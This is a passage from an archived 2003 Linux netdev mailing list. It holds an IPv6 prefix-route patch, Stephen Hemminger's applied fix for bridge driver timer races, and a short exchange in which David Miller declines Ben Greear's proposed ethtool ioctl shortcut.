07:51:39.000000000 -0700 +++ linux-2.4.21.new/net/ipv6/addrconf.c 2003-07-22 15:13:53.000000000 -0700 @@ -101,7 +101,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static 
void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -889,7 +889,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL); } @@ -916,7 +916,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1008,7 +1008,7 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1054,7 +1054,7 @@ return; } - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1166,7 +1166,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1341,7 +1341,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1578,8 +1578,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1593,7 +1592,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1603,7 
+1602,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); diff -ruN linux-2.4.21.org/net/ipv6/route.c linux-2.4.21.new/net/ipv6/route.c --- linux-2.4.21.org/net/ipv6/route.c 2003-06-13 07:51:39.000000000 -0700 +++ linux-2.4.21.new/net/ipv6/route.c 2003-07-22 15:15:56.000000000 -0700 @@ -1516,13 +1516,19 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1603,10 +1609,17 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1757,7 +1770,7 @@ fl.nl_u.ip6_u.saddr, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1783,7 +1796,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, 
RTMGRP_IPV6_ROUTE, EINVAL); return; From shemminger@osdl.org Tue Jul 22 20:45:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 20:45:42 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N3jWFl025997 for ; Tue, 22 Jul 2003 20:45:34 -0700 Received: from localhost.localdomain (build.pdx.osdl.net [172.20.1.2]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6N3jCI17634; Tue, 22 Jul 2003 20:45:12 -0700 Date: Tue, 22 Jul 2003 23:45:08 -0400 From: Stephen Hemminger To: davem@redhat.com, Steffen Klassert , Christian Mautner Cc: netdev@oss.sgi.com Subject: [PATCH] Fix bridge timer race Message-Id: <20030722234508.0af40e80.shemminger@osdl.org> Organization: OSDL X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4220 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev This should fix several startup/shutdown timer races in the bridge driver. Added some paranoia checks for dangling timers. 
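[Editorial note] Several hunks in the patch that follows replace the pair "timer.expires = ...; add_timer(&timer);" with a single mod_timer() call. The reason, as far as it can be read from the patch, is that add_timer() must only be used on a timer that is not already pending, while mod_timer() is safe in either state. The following is a minimal userspace sketch of that difference. The toy_* names and struct toy_timer are hypothetical stand-ins and not the kernel's struct timer_list API; only the pending/not-pending semantics are modelled, not the locking.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy userspace stand-in for a kernel timer (hypothetical, not struct timer_list). */
struct toy_timer {
	unsigned long expires;	/* expiry time, in arbitrary ticks */
	bool pending;		/* true while the timer is queued */
};

/*
 * Models add_timer(): only legal on a timer that is not queued.
 * Returns -1 in the case where the real kernel would complain.
 */
static int toy_add_timer(struct toy_timer *t)
{
	if (t->pending)
		return -1;
	t->pending = true;
	return 0;
}

/* Models del_timer(): returns 1 if it deactivated a pending timer, else 0. */
static int toy_del_timer(struct toy_timer *t)
{
	int was_pending = t->pending;

	t->pending = false;
	return was_pending;
}

/*
 * Models mod_timer(): dequeue if needed, update the expiry, queue again.
 * Safe whether or not the timer was pending; returns the old pending state.
 */
static int toy_mod_timer(struct toy_timer *t, unsigned long expires)
{
	int was_pending = toy_del_timer(t);

	t->expires = expires;
	toy_add_timer(t);
	return was_pending;
}
```

In this model, re-arming a timer that is still queued through toy_add_timer() fails, whereas toy_mod_timer() simply moves the expiry. That is the property the hello, tcn and forward-delay timer hunks appear to rely on.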
diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_device.c linux-2.5-bridge/net/bridge/br_device.c --- linux-2.6.0-test1/net/bridge/br_device.c 2003-07-20 19:21:47.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_device.c 2003-07-22 08:51:22.000000000 -0400 @@ -110,23 +110,38 @@ return -1; } +/* convert later to direct kfree */ +static void br_dev_free(struct net_device *dev) +{ + struct net_bridge *br = dev->priv; + + WARN_ON(!list_empty(&br->port_list)); + WARN_ON(!list_empty(&br->age_list)); + + BUG_ON(timer_pending(&br->hello_timer)); + BUG_ON(timer_pending(&br->tcn_timer)); + BUG_ON(timer_pending(&br->topology_change_timer)); + BUG_ON(timer_pending(&br->gc_timer)); + + kfree(dev); +} void br_dev_setup(struct net_device *dev) { memset(dev->dev_addr, 0, ETH_ALEN); + ether_setup(dev); + dev->do_ioctl = br_dev_do_ioctl; dev->get_stats = br_dev_get_stats; dev->hard_start_xmit = br_dev_xmit; dev->open = br_dev_open; dev->set_multicast_list = br_dev_set_multicast_list; - dev->destructor = (void (*)(struct net_device *))kfree; + dev->destructor = br_dev_free; SET_MODULE_OWNER(dev); dev->stop = br_dev_stop; dev->accept_fastpath = br_dev_accept_fastpath; dev->tx_queue_len = 0; dev->set_mac_address = NULL; dev->priv_flags = IFF_EBRIDGE; - - ether_setup(dev); } diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_if.c linux-2.5-bridge/net/bridge/br_if.c --- linux-2.6.0-test1/net/bridge/br_if.c 2003-07-20 19:21:47.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_if.c 2003-07-22 09:54:57.000000000 -0400 @@ -41,6 +41,13 @@ static void destroy_nbp(void *arg) { struct net_bridge_port *p = arg; + + p->dev->br_port = NULL; + + BUG_ON(timer_pending(&p->message_age_timer)); + BUG_ON(timer_pending(&p->forward_delay_timer)); + BUG_ON(timer_pending(&p->hold_timer)); + dev_put(p->dev); kfree(p); } @@ -53,16 +60,19 @@ br_stp_disable_port(p); dev_set_promiscuity(dev, -1); - dev->br_port = NULL; list_del_rcu(&p->list); br_fdb_delete_by_port(p->br, p); + 
del_timer(&p->message_age_timer); + del_timer(&p->forward_delay_timer); + del_timer(&p->hold_timer); + call_rcu(&p->rcu, destroy_nbp, p); } -static void del_ifs(struct net_bridge *br) +static void del_br(struct net_bridge *br) { struct list_head *p, *n; @@ -71,6 +81,10 @@ del_nbp(list_entry(p, struct net_bridge_port, list)); } spin_unlock_bh(&br->lock); + + del_timer_sync(&br->gc_timer); + + unregister_netdevice(br->dev); } static struct net_bridge *new_nb(const char *name) @@ -182,15 +196,14 @@ ret = -EBUSY; } - else { - del_ifs((struct net_bridge *) dev->priv); - unregister_netdevice(dev); - } + else + del_br(dev->priv); rtnl_unlock(); return ret; } +/* called under bridge lock */ int br_add_if(struct net_bridge *br, struct net_device *dev) { struct net_bridge_port *p; @@ -205,7 +218,6 @@ return -ELOOP; dev_hold(dev); - spin_lock_bh(&br->lock); if ((p = new_nbp(br, dev)) == NULL) { spin_unlock_bh(&br->lock); dev_put(dev); @@ -218,26 +230,21 @@ br_fdb_insert(br, p, dev->dev_addr, 1); if ((br->dev->flags & IFF_UP) && (dev->flags & IFF_UP)) br_stp_enable_port(p); - spin_unlock_bh(&br->lock); return 0; } +/* called under bridge lock */ int br_del_if(struct net_bridge *br, struct net_device *dev) { struct net_bridge_port *p; - int retval = 0; - spin_lock_bh(&br->lock); if ((p = dev->br_port) == NULL || p->br != br) - retval = -EINVAL; - else { - del_nbp(p); - br_stp_recalculate_bridge_id(br); - } - spin_unlock_bh(&br->lock); + return -EINVAL; - return retval; + del_nbp(p); + br_stp_recalculate_bridge_id(br); + return 0; } int br_get_bridge_ifindices(int *indices, int num) @@ -274,13 +281,8 @@ rtnl_lock(); for (dev = dev_base; dev; dev = nxt) { nxt = dev->next; - if (dev->priv_flags & IFF_EBRIDGE) { - pr_debug("cleanup %s\n", dev->name); - - del_ifs((struct net_bridge *) dev->priv); - - unregister_netdevice(dev); - } + if (dev->priv_flags & IFF_EBRIDGE) + del_br(dev->priv); } rtnl_unlock(); diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_ioctl.c 
linux-2.5-bridge/net/bridge/br_ioctl.c --- linux-2.6.0-test1/net/bridge/br_ioctl.c 2003-07-20 19:21:47.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_ioctl.c 2003-07-21 21:33:04.000000000 -0400 @@ -59,10 +59,12 @@ if (dev == NULL) return -EINVAL; + spin_lock_bh(&br->lock); if (cmd == BRCTL_ADD_IF) ret = br_add_if(br, dev); else ret = br_del_if(br, dev); + spin_unlock_bh(&br->lock); dev_put(dev); return ret; diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_notify.c linux-2.5-bridge/net/bridge/br_notify.c --- linux-2.6.0-test1/net/bridge/br_notify.c 2003-07-20 19:21:47.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_notify.c 2003-07-21 21:33:04.000000000 -0400 @@ -38,39 +38,27 @@ br = p->br; + spin_lock_bh(&br->lock); switch (event) { case NETDEV_CHANGEADDR: - spin_lock_bh(&br->lock); br_fdb_changeaddr(p, dev->dev_addr); br_stp_recalculate_bridge_id(br); - spin_unlock_bh(&br->lock); - break; - - case NETDEV_GOING_DOWN: - /* extend the protocol to send some kind of notification? 
*/ break; case NETDEV_DOWN: - if (br->dev->flags & IFF_UP) { - spin_lock_bh(&br->lock); - br_stp_disable_port(p); - spin_unlock_bh(&br->lock); - } + br_stp_disable_port(p); break; case NETDEV_UP: - if (!(br->dev->flags & IFF_UP)) { - spin_lock_bh(&br->lock); - br_stp_enable_port(p); - spin_unlock_bh(&br->lock); - } + br_stp_enable_port(p); break; case NETDEV_UNREGISTER: br_del_if(br, dev); break; } + spin_unlock_bh(&br->lock); return NOTIFY_DONE; } diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_stp_if.c linux-2.5-bridge/net/bridge/br_stp_if.c --- linux-2.6.0-test1/net/bridge/br_stp_if.c 2003-07-20 19:21:48.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_stp_if.c 2003-07-22 00:44:46.000000000 -0400 @@ -43,8 +43,7 @@ struct net_bridge_port *p; spin_lock_bh(&br->lock); - br->hello_timer.expires = jiffies + br->hello_time; - add_timer(&br->hello_timer); + mod_timer(&br->hello_timer, jiffies + br->hello_time); br_config_bpdu_generation(br); list_for_each_entry(p, &br->port_list, list) { @@ -74,8 +73,6 @@ del_timer_sync(&br->hello_timer); del_timer_sync(&br->topology_change_timer); del_timer_sync(&br->tcn_timer); - del_timer_sync(&br->gc_timer); - } /* called under bridge lock */ diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_stp_timer.c linux-2.5-bridge/net/bridge/br_stp_timer.c --- linux-2.6.0-test1/net/bridge/br_stp_timer.c 2003-07-20 19:21:48.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_stp_timer.c 2003-07-22 10:08:46.000000000 -0400 @@ -43,8 +43,7 @@ if (br->dev->flags & IFF_UP) { br_config_bpdu_generation(br); - br->hello_timer.expires = jiffies + br->hello_time; - add_timer(&br->hello_timer); + mod_timer(&br->hello_timer, jiffies + br->hello_time); } spin_unlock_bh(&br->lock); } @@ -73,6 +72,8 @@ * check is redundant. I'm leaving it in for now, though. 
*/ spin_lock_bh(&br->lock); + if (p->state == BR_STATE_DISABLED) + goto unlock; was_root = br_is_root_bridge(br); br_become_designated_port(p); @@ -80,6 +81,7 @@ br_port_state_selection(br); if (br_is_root_bridge(br) && !was_root) br_become_root_bridge(br); + unlock: spin_unlock_bh(&br->lock); } @@ -93,8 +95,8 @@ spin_lock_bh(&br->lock); if (p->state == BR_STATE_LISTENING) { p->state = BR_STATE_LEARNING; - p->forward_delay_timer.expires = jiffies + br->forward_delay; - add_timer(&p->forward_delay_timer); + mod_timer(&p->forward_delay_timer, + jiffies + br->forward_delay); } else if (p->state == BR_STATE_LEARNING) { p->state = BR_STATE_FORWARDING; if (br_is_designated_for_some_port(br)) @@ -113,8 +115,7 @@ if (br->dev->flags & IFF_UP) { br_transmit_tcn(br); - br->tcn_timer.expires = jiffies + br->bridge_hello_time; - add_timer(&br->tcn_timer); + mod_timer(&br->tcn_timer,jiffies + br->bridge_hello_time); } spin_unlock_bh(&br->lock); } From davem@redhat.com Tue Jul 22 20:57:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 20:57:18 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N3vEFl026984 for ; Tue, 22 Jul 2003 20:57:14 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id UAA08191; Tue, 22 Jul 2003 20:54:58 -0700 Date: Tue, 22 Jul 2003 20:54:57 -0700 From: "David S. 
Miller" To: Stephen Hemminger Cc: klassert@mathematik.tu-chemnitz.de, linux@mautner.ca, netdev@oss.sgi.com Subject: Re: [PATCH] Fix bridge timer race Message-Id: <20030722205457.227847c2.davem@redhat.com> In-Reply-To: <20030722234508.0af40e80.shemminger@osdl.org> References: <20030722234508.0af40e80.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4221 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 23:45:08 -0400 Stephen Hemminger wrote: > This should fix several startup/shutdown timer races in the bridge > driver. Added some paranoia checks for dangling timers. Applied, thanks. From greearb@candelatech.com Tue Jul 22 22:06:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 22:06:16 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N56CFl030054 for ; Tue, 22 Jul 2003 22:06:13 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N565m2009293 for ; Tue, 22 Jul 2003 22:06:07 -0700 Message-ID: <3F1E17BC.30100@candelatech.com> Date: Tue, 22 Jul 2003 22:06:04 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "'netdev@oss.sgi.com'" Subject: netdev_ops? 
Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4222 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Any progress towards getting the netdev_ops into 2.4? I have several patches that would benefit (in that no new ioctls would be needed) if this goes in. Thanks, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Tue Jul 22 22:09:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 22:10:02 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N59uFl030507 for ; Tue, 22 Jul 2003 22:09:56 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA08348; Tue, 22 Jul 2003 22:07:45 -0700 Date: Tue, 22 Jul 2003 22:07:45 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? Message-Id: <20030722220745.379a73c6.davem@redhat.com> In-Reply-To: <3F1E17BC.30100@candelatech.com> References: <3F1E17BC.30100@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4223 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 22:06:04 -0700 Ben Greear wrote: > Any progress towards getting the netdev_ops into 2.4? > > I have several patches that would benefit (in that no new ioctls > would be needed) if this goes in. 
If anything, it's going to go into 2.6.x first, and then backported to 2.4.x after it's had a few months of testing and tweaking. From greearb@candelatech.com Tue Jul 22 22:30:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 22:30:35 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N5UGFl032353 for ; Tue, 22 Jul 2003 22:30:16 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N5UAm2012293; Tue, 22 Jul 2003 22:30:11 -0700 Message-ID: <3F1E1D62.90009@candelatech.com> Date: Tue, 22 Jul 2003 22:30:10 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: netdev_ops? References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> In-Reply-To: <20030722220745.379a73c6.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4224 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Tue, 22 Jul 2003 22:06:04 -0700 > Ben Greear wrote: > > >>Any progress towards getting the netdev_ops into 2.4? >> >>I have several patches that would benefit (in that no new ioctls >>would be needed) if this goes in. > > > If anything, it's going to go into 2.6.x first, and then backported > to 2.4.x after it's had a few months of testing and tweaking. > Any interest in a lower-risk netdev-ops lite? I have a relatively ugly little patch that will allow me to handle certain ETHTOOL ioctls in dev.c's ioctl handling code. 
Ugly, but short, and very little chance of breaking anything else.... -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Tue Jul 22 23:04:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 23:04:31 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N64RFl002259 for ; Tue, 22 Jul 2003 23:04:27 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA08407; Tue, 22 Jul 2003 23:02:16 -0700 Date: Tue, 22 Jul 2003 23:02:15 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? Message-Id: <20030722230215.284dd270.davem@redhat.com> In-Reply-To: <3F1E1D62.90009@candelatech.com> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4225 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 22:30:10 -0700 Ben Greear wrote: > Any interest in a lower-risk netdev-ops lite? Not really. Nobody is really helped with this, not even you. It makes almost no sense to make a driver only work with a 2.4.x kernel that has this netdev-ops-lite thing patched into it, because then it doesn't work on all the bazillion other 2.4.x kernels out there. 
From greearb@candelatech.com Tue Jul 22 23:24:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 23:24:13 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N6O6Fl003678 for ; Tue, 22 Jul 2003 23:24:06 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N6O0m2019364; Tue, 22 Jul 2003 23:24:00 -0700 Message-ID: <3F1E2A00.5080506@candelatech.com> Date: Tue, 22 Jul 2003 23:24:00 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: netdev_ops? References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> In-Reply-To: <20030722230215.284dd270.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4226 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Tue, 22 Jul 2003 22:30:10 -0700 > Ben Greear wrote: > > >>Any interest in a lower-risk netdev-ops lite? > > > Not really. > > Nobody is really helped with this, not even you. It makes almost no > sense to make a driver only work with a 2.4.x kernel that has this > netdev-ops-lite thing patched into it, because then it doesn't work on > all the bazillion other 2.4.x kernels out there. My goal is a place to add new generic net-device ioctls without having to worry about testing the ioctls on various platforms (You've said before you don't like when I try to add new ioctls because I break SPARC and who knows what else...) 
My patch looks like this, and it has zero impact on drivers. It's primary benefit is to get around adding more ioctls:

### Line 2304 or so, default case of the dev_ifsioc switch... ###

        default:
+               /* Handle some generic ethtool commands here */
+               if (cmd == SIOCETHTOOL) {
+                       u32 cmd = 0;
+                       if (copy_from_user(&cmd, ifr->ifr_data, sizeof(cmd))) {
+                               return -EFAULT;
+                       }
+
+                       if (cmd == ETHTOOL_GNDSTATS) {
+
+                               struct ethtool_ndstats* nds = (struct ethtool_ndstats*)(ifr->ifr_data);
+
+                               /* Get net-device stats struct, will save it in the space
+                                * passed in to us in ifr->ifr_data. Would like to use
+                                * ethtool, but it seems to require specific driver support,
+                                * when this is a general purpose netdevice request...
+                                */
+                               struct net_device_stats *stats = dev->get_stats(dev);
+                               if (stats) {
+                                       if (copy_to_user(nds->data, stats, sizeof(*stats))) {
+                                               return -EFAULT;
+                                       }
+                               }
+                               else {
+                                       return -EOPNOTSUPP;
+                               }
+                               return 0;
+                       }
+               }
+
+
### Fall through to the rest of the ioctl (ethtool included) handling...

-- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Tue Jul 22 23:29:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 23:29:35 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N6TVFl004281 for ; Tue, 22 Jul 2003 23:29:31 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA08537; Tue, 22 Jul 2003 23:27:19 -0700 Date: Tue, 22 Jul 2003 23:27:19 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops?
Message-Id: <20030722232719.216d7823.davem@redhat.com> In-Reply-To: <3F1E2A00.5080506@candelatech.com> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4227 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 23:24:00 -0700 Ben Greear wrote: > My goal is a place to add new generic net-device ioctls without having > to worry about testing the ioctls on various platforms Your patch adds ethtool stuff, which works perfectly fine on all platforms, even sparc64 when executing 32-bit binaries. Just add it to your drivers if you want them supported in 2.4.x > (You've said > before you don't like when I try to add new ioctls because I break SPARC and > who knows what else...) You're not adding new ioctls here, you adding a default implementation of an existing ioctl, and this kind of code is of no issue wrt SPARC/PPC/MIPS/etc. ioctl 